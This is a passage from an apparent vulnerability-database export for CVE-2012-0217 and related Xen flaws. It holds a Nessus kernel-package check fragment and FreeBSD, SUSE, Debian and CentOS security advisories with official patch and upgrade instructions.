ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-308.8.2.0.1.el5\")) flag++;\n\n\nif 
(flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-12:04.sysret Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: Privilege escalation when returning from kernel\r\n\r\nCategory: core\r\nModule: sys_amd64\r\nAnnounced: 2012-06-12\r\nCredits: Rafal Wojtczuk, John Baldwin\r\nAffects: All supported versions of FreeBSD\r\nCorrected: 2012-06-12 12:10:10 UTC (RELENG_7, 7.4-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_7_4, 7.4-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8, 8.3-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_3, 8.3-RELEASE-p3)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_2, 8.2-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_1, 8.1-RELEASE-p11)\r\n 2012-06-12 12:10:10 UTC (RELENG_9, 9.0-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_9_0, 9.0-RELEASE-p3)\r\nCVE Name: CVE-2012-0217\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nThe FreeBSD operating system implements a rings model of security, where\r\nprivileged operations are done in the kernel, and most applications\r\nrequest access to these operations by making a system call, which puts\r\nthe CPU into the required privilege level and passes control to the\r\nkernel.\r\n\r\nII. 
Problem Description\r\n\r\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\r\nbehaviour of CPUs in 64 bit mode a sanity check of the kernel may be\r\ninsufficient when returning from a system call.\r\n\r\nIII. Impact\r\n\r\nSuccessful exploitation of the problem can lead to local kernel privilege\r\nescalation, kernel data corruption and/or crash.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run code with user\r\nprivileges on the target system.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nHowever FreeBSD/amd64 running on AMD CPUs is not vulnerable to this\r\nparticular problem.\r\n\r\nSystems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386\r\nkernel are not vulnerable, nor are systems running on different\r\nprocessor architectures.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,\r\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4,\r\n8.3, 8.2, 8.1 and 9.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,\r\nor 9.0-RELEASE on the i386 or amd64 platforms can be updated via the\r\nfreebsd-update(8) utility:\r\n\r\n# freebsd-update 
fetch\r\n# freebsd-update install\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/amd64/amd64/trap.c 1.319.2.14\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.11\r\n src/sys/conf/newvers.sh 1.72.2.18.2.14\r\n src/sys/amd64/amd64/trap.c 1.319.2.12.2.2\r\nRELENG_8\r\n src/sys/amd64/amd64/trap.c 1.332.2.24\r\nRELENG_8_3\r\n src/UPDATING 1.632.2.26.2.5\r\n src/sys/conf/newvers.sh 1.83.2.15.2.7\r\n src/sys/amd64/amd64/trap.c 1.332.2.21.2.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.11\r\n src/sys/conf/newvers.sh 1.83.2.12.2.14\r\n src/sys/amd64/amd64/trap.c 1.332.2.14.2.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.14\r\n src/sys/conf/newvers.sh 1.83.2.10.2.15\r\n src/sys/amd64/amd64/trap.c 1.332.2.10.2.2\r\nRELENG_9\r\n src/sys/amd64/amd64/trap.c 1.357.2.9\r\nRELENG_9_0\r\n src/UPDATING 1.702.2.4.2.5\r\n src/sys/conf/newvers.sh 1.95.2.4.2.7\r\n src/sys/amd64/amd64/trap.c 1.357.2.2.2.3\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r236953\r\nreleng/7.4/ r236953\r\nstable/8/ r236953\r\nreleng/8.3/ r236953\r\nreleng/8.2/ r236953\r\nreleng/8.1/ r236953\r\nstable/9/ r236953\r\nreleng/9.0/ r236953\r\n- -------------------------------------------------------------------------\r\n\r\nVII. 
References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-12:04.sysret.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (FreeBSD)\r\n\r\niEYEARECAAYFAk/XQGgACgkQFdaIBMps37KCsACdEvLcb0JhWKmVlvq5SuKzuW1Q\r\nfhsAnRVLFoGa2WGnRpfQrLYCjL9gs8Rd\r\n=RvZd\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-13T00:00:00", "published": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28131", "title": "CVE-2012-0217", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-12:04.sysret Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: Privilege escalation when returning from kernel\r\n\r\nCategory: core\r\nModule: sys_amd64\r\nAnnounced: 2012-06-12\r\nCredits: Rafal Wojtczuk, John Baldwin\r\nAffects: All supported versions of FreeBSD\r\nCorrected: 2012-06-12 12:10:10 UTC (RELENG_7, 7.4-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_7_4, 7.4-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8, 8.3-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_3, 8.3-RELEASE-p3)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_2, 8.2-RELEASE-p9)\r\n 2012-06-18 21:00:54 UTC (RELENG_8_1, 8.1-RELEASE-p12)\r\n 2012-06-12 12:10:10 UTC (RELENG_9, 9.0-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_9_0, 9.0-RELEASE-p3)\r\nCVE Name: CVE-2012-0217\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\n0. 
Revision History\r\n\r\nv1.0 2012-06-12 Initial release.\r\nv1.1 2012-06-19 Corrected patch FreeBSD 8.1.\r\n\r\nI. Background\r\n\r\nThe FreeBSD operating system implements a rings model of security, where\r\nprivileged operations are done in the kernel, and most applications\r\nrequest access to these operations by making a system call, which puts\r\nthe CPU into the required privilege level and passes control to the\r\nkernel.\r\n\r\nII. Problem Description\r\n\r\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\r\nbehaviour of CPUs in 64 bit mode a sanity check of the kernel may be\r\ninsufficient when returning from a system call.\r\n\r\nIII. Impact\r\n\r\nSuccessful exploitation of the problem can lead to local kernel privilege\r\nescalation, kernel data corruption and/or crash.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run code with user\r\nprivileges on the target system.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nHowever FreeBSD/amd64 running on AMD CPUs is not vulnerable to this\r\nparticular problem.\r\n\r\nSystems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386\r\nkernel are not vulnerable, nor are systems running on different\r\nprocessor architectures.\r\n\r\nV. 
Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,\r\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4,\r\n8.3, 8.2, 8.1 and 9.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n[7.4, 8.3, 8.2, 9.0]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc\r\n\r\n[8.1]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch.asc\r\n\r\n[8.1 if original sysret.patch has been applied]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,\r\nor 9.0-RELEASE on the i386 or amd64 platforms can be updated via the\r\nfreebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. 
Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/amd64/amd64/trap.c 1.319.2.14\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.11\r\n src/sys/conf/newvers.sh 1.72.2.18.2.14\r\n src/sys/amd64/amd64/trap.c 1.319.2.12.2.2\r\nRELENG_8\r\n src/sys/amd64/amd64/trap.c 1.332.2.24\r\nRELENG_8_3\r\n src/UPDATING 1.632.2.26.2.5\r\n src/sys/conf/newvers.sh 1.83.2.15.2.7\r\n src/sys/amd64/amd64/trap.c 1.332.2.21.2.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.11\r\n src/sys/conf/newvers.sh 1.83.2.12.2.14\r\n src/sys/amd64/amd64/trap.c 1.332.2.14.2.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.15\r\n src/sys/conf/newvers.sh 1.83.2.10.2.16\r\n src/sys/amd64/amd64/trap.c 1.332.2.10.2.3\r\nRELENG_9\r\n src/sys/amd64/amd64/trap.c 1.357.2.9\r\nRELENG_9_0\r\n src/UPDATING 1.702.2.4.2.5\r\n src/sys/conf/newvers.sh 1.95.2.4.2.7\r\n src/sys/amd64/amd64/trap.c 1.357.2.2.2.3\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r236953\r\nreleng/7.4/ r236953\r\nstable/8/ r236953\r\nreleng/8.3/ r236953\r\nreleng/8.2/ r236953\r\nreleng/8.1/ r237242\r\nstable/9/ r236953\r\nreleng/9.0/ r236953\r\n- -------------------------------------------------------------------------\r\n\r\nVII. 
References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-12:04.sysret.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9\r\n\r\niEYEARECAAYFAk/gjHQACgkQFdaIBMps37KutQCgkcp+lqFuJ3/fQKUemn80suW5\r\nu/wAn2VLxY5LoUPNsN2eUHYB4GMz0AHl\r\n=tQOk\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:DOC:28207", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28207", "title": "FreeBSD Security Advisory FreeBSD-SA-12:04.sysret [REVISED]", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:47:49", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "Three security issues were found in XEN.\n\n Two security issues are fixed by this update:\n\n *\n\n CVE-2012-0217: Due to incorrect fault handling in the\n XEN hypervisor it was possible for a XEN guest domain\n administrator to execute code in the XEN host environment.\n\n *\n\n CVE-2012-0218: Also a guest user could crash the\n guest XEN kernel due to a protection fault bounce.\n\n The third fix is changing the Xen behaviour on certain\n hardware:\n\n *\n\n CVE-2012-2934: The issue is a denial of service issue\n on older pre-SVM AMD CPUs (AMD Erratum 121).\n\n AMD Erratum #121 is described in "Revision Guide for\n AMD Athlon 64 and AMD Opteron Processors":\n <a rel=\"nofollow\" href=\"http://support.amd.com/us/Processor_TechDocs/25759.pdf\">http://support.amd.com/us/Processor_TechDocs/25759.pdf</a>\n <<a rel=\"nofollow\" href=\"http://support.amd.com/us/Processor_TechDocs/25759.pdf\">http://support.amd.com/us/Processor_TechDocs/25759.pdf</a>>\n\n The following 130nm and 90nm (DDR1-only) AMD\n processors are subject to this 
erratum:\n\n o\n\n First-generation AMD-Opteron(tm) single and\n dual core processors in either 939 or 940 packages:\n\n + AMD Opteron(tm) 100-Series Processors\n + AMD Opteron(tm) 200-Series Processors\n + AMD Opteron(tm) 800-Series Processors\n + AMD Athlon(tm) processors in either 754,\n 939 or 940 packages\n + AMD Sempron(tm) processor in either 754\n or 939 packages\n + AMD Turion(tm) Mobile Technology in 754\n package\n\n This issue does not affect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except\n by upgrading your hardware to a newer revision, or not\n allowing untrusted 64-bit guest systems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option \"allow_unsafe\" for\n GRUB which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line\n looking like this:\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing\n boot options for the host.\n", "edition": 1, "modified": "2012-06-12T23:08:27", "published": "2012-06-12T23:08:27", "id": "SUSE-SU-2012:0730-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-06/msg00008.html", "title": "Security update for Xen (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:35", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "This update of XEN fixed multiple security flaws that could\n be exploited by local attackers to cause a Denial of\n Service or potentially escalate privileges. 
Additionally,\n several other upstream changes were backported.\n\n", "edition": 1, "modified": "2012-07-18T15:08:32", "published": "2012-07-18T15:08:32", "id": "OPENSUSE-SU-2012:0886-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00008.html", "type": "suse", "title": "xen (critical)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:41:29", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3433", "CVE-2012-2625", "CVE-2012-3432"], "description": "Xen was updated to fix several security issues:\n\n *\n\n CVE-2012-3433: A xen HVM guest destroy p2m teardown\n host DoS vulnerability was fixed, where malicious guest\n could lock/crash the host.\n\n *\n\n CVE-2012-3432: A xen HVM guest user mode MMIO\n emulation DoS was fixed.\n\n *\n\n CVE-2012-2625: The xen pv bootloader doesn't check\n the size of the bzip2 or lzma compressed kernel, leading to\n denial of service (crash).\n\n Also the following bug in XEN has been fixed:\n\n * bnc#746702 - Xen HVM DomU crash during Windows Server\n 2008 R2 install, when maxmem > memory\n\n This update also included bugfixes for:\n\n *\n\n vm-install: - bnc#762963 - ReaR: Unable to recover a\n paravirtualized XEN guest\n\n *\n\n virt-manager - SLE11-SP2 ONLY\n\n * bnc#764982 - virt-manager fails to start after\n upgrade to SLES11 SP2 from SLES10\n", "edition": 1, "modified": "2012-08-27T17:08:36", "published": "2012-08-27T17:08:36", "id": "SUSE-SU-2012:1043-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00024.html", "title": "Security update for Xen and libvirt (important)", "type": "suse", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:04:33", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3433", "CVE-2012-2625", "CVE-2012-3432"], "description": "Xen was updated to fix several security issues:\n\n *\n\n CVE-2012-3433: A xen HVM guest 
destroy p2m teardown\n host DoS vulnerability was fixed, where malicious guest\n could lock/crash the host.\n\n *\n\n CVE-2012-3432: A xen HVM guest user mode MMIO\n emulation DoS was fixed.\n\n *\n\n CVE-2012-2625: The xen pv bootloader doesn't check\n the size of the bzip2 or lzma compressed kernel, leading to\n denial of service (crash).\n\n Also the following bug in XEN was fixed:\n\n * bnc#746702 - Xen HVM DomU crash during Windows Server\n 2008 R2 install, when maxmem > memory\n\n This update also included bugfixes for:\n\n * vm-install: - bnc#762963 - ReaR: Unable to recover a\n paravirtualized XEN guest\n", "edition": 1, "modified": "2012-08-27T17:08:38", "published": "2012-08-27T17:08:38", "id": "SUSE-SU-2012:1044-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00025.html", "title": "Security update for Xen (important)", "type": "suse", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3515", "CVE-2012-3496", "CVE-2012-2625", "CVE-2012-3432"], "description": "Security Update for Xen\n\n Following fixes were done:\n - bnc#776995 - attaching scsi control luns with pvscsi\n - xend/pvscsi: fix passing of SCSI control LUNs\n xen-bug776995-pvscsi-no-devname.patch\n - xend/pvscsi: fix usage of persistant device names for\n SCSI devices xen-bug776995-pvscsi-persistent-names.patch\n - xend/pvscsi: update sysfs parser for Linux 3.0\n xen-bug776995-pvscsi-sysfs-parser.patch\n\n - bnc#777090 - VUL-0: CVE-2012-3494: xen: hypercall\n set_debugreg vulnerability (XSA-12)\n CVE-2012-3494-xsa12.patch\n - bnc#777091 - VUL-0: CVE-2012-3496: xen:\n XENMEM_populate_physmap DoS vulnerability (XSA-14)\n CVE-2012-3496-xsa14.patch\n - bnc#777084 - VUL-0: CVE-2012-3515: xen: Qemu VT100\n emulation vulnerability (XSA-17) CVE-2012-3515-xsa17.patch\n\n - bnc#744771 - VM with passed through PCI card fails 
to\n reboot under dom0 load 24888-pci-release-devices.patch\n\n - Upstream patches from Jan\n 25431-x86-EDD-MBR-sig-check.patch\n 25459-page-list-splice.patch\n 25478-x86-unknown-NMI-deadlock.patch\n 25480-x86_64-sysret-canonical.patch\n 25481-x86_64-AMD-erratum-121.patch\n 25485-x86_64-canonical-checks.patch\n 25587-param-parse-limit.patch 25617-vtd-qinval-addr.patch\n 25688-x86-nr_irqs_gsi.patch\n\n - bnc#773393 - VUL-0: CVE-2012-3433: xen: HVM guest destroy\n p2m teardown host DoS vulnerability\n CVE-2012-3433-xsa11.patch\n - bnc#773401 - VUL-1: CVE-2012-3432: xen: HVM guest user\n mode MMIO emulation DoS\n 25682-x86-inconsistent-io-state.patch\n\n - bnc#762484 - VUL-1: CVE-2012-2625: xen: pv bootloader\n doesn't check the size of the bzip2 or lzma compressed\n kernel, leading to denial of service\n 25589-pygrub-size-limits.patch\n\n", "edition": 1, "modified": "2012-09-14T14:12:18", "published": "2012-09-14T14:12:18", "id": "OPENSUSE-SU-2012:1174-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-09/msg00018.html", "title": "Security Update for Xen (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:16:01", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2501-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJune 24, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2012-0217 CVE-2012-0218 CVE-2012-2934\n\nSeveral vulnerabilities were discovered in Xen, a hypervisor.\n\nCVE-2012-0217\n\tXen does not properly handle uncanonical return addresses on\n\tIntel amd64 CPUs, allowing amd64 PV 
guests to elevate to\n\thypervisor privileges. AMD processors, HVM and i386 guests\n\tare not affected.\n\nCVE-2012-0218\n\tXen does not properly handle SYSCALL and SYSENTER instructions\n\tin PV guests, allowing unprivileged users inside a guest\n\tsystem to crash the guest system.\n\nCVE-2012-2934\n\tXen does not detect old AMD CPUs affected by AMD Erratum #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the "allow_unsafe" option is passed.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version\n4.1.3~rc1+hg-20120614.a9c0a89c08f2-1.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2012-06-24T15:22:55", "published": "2012-06-24T15:22:55", "id": "DEBIAN:DSA-2501-1:A44C3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00140.html", "title": "[SECURITY] [DSA 2501-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:20:21", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2508-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nJuly 22, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : kfreebsd-8\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2012-0217\nDebian Bug : 677297\n\nRafal Wojtczuk from Bromium 
discovered that FreeBSD wasn't handling correctly\nuncanonical return addresses on Intel amd64 CPUs, allowing privilege escalation\nto kernel for local users.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 8.1+dfsg-8+squeeze3.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 8.3-4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 8.3-4.\n\nWe recommend that you upgrade your kfreebsd-8 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2012-07-22T12:23:05", "published": "2012-07-22T12:23:05", "id": "DEBIAN:DSA-2508-1:4DE0E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00155.html", "title": "[SECURITY] [DSA 2508-1] kfreebsd-8 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0721\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An unprivileged\nuser in a 64-bit para-virtualized guest, that is running on a 64-bit host\nthat has an Intel CPU, could use this flaw to crash the host or,\npotentially, escalate their privileges, allowing them to execute arbitrary\ncode at the hypervisor level. 
(CVE-2012-0217, Important)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs, leading\nto a CPU hard lockup, when running on the Xen hypervisor implementation. An\nunprivileged user in a 64-bit para-virtualized guest could use this flaw to\ncrash the host. Warning: After installing this update, hosts that are using\nan affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\nfail to boot. In order to boot such hosts, the new kernel parameter,\nallow_unsafe, can be used (\"allow_unsafe=on\"). This option should only be\nused with hosts that are running trusted guests, as setting it to \"on\"\nreintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\nModerate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these issues.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. 
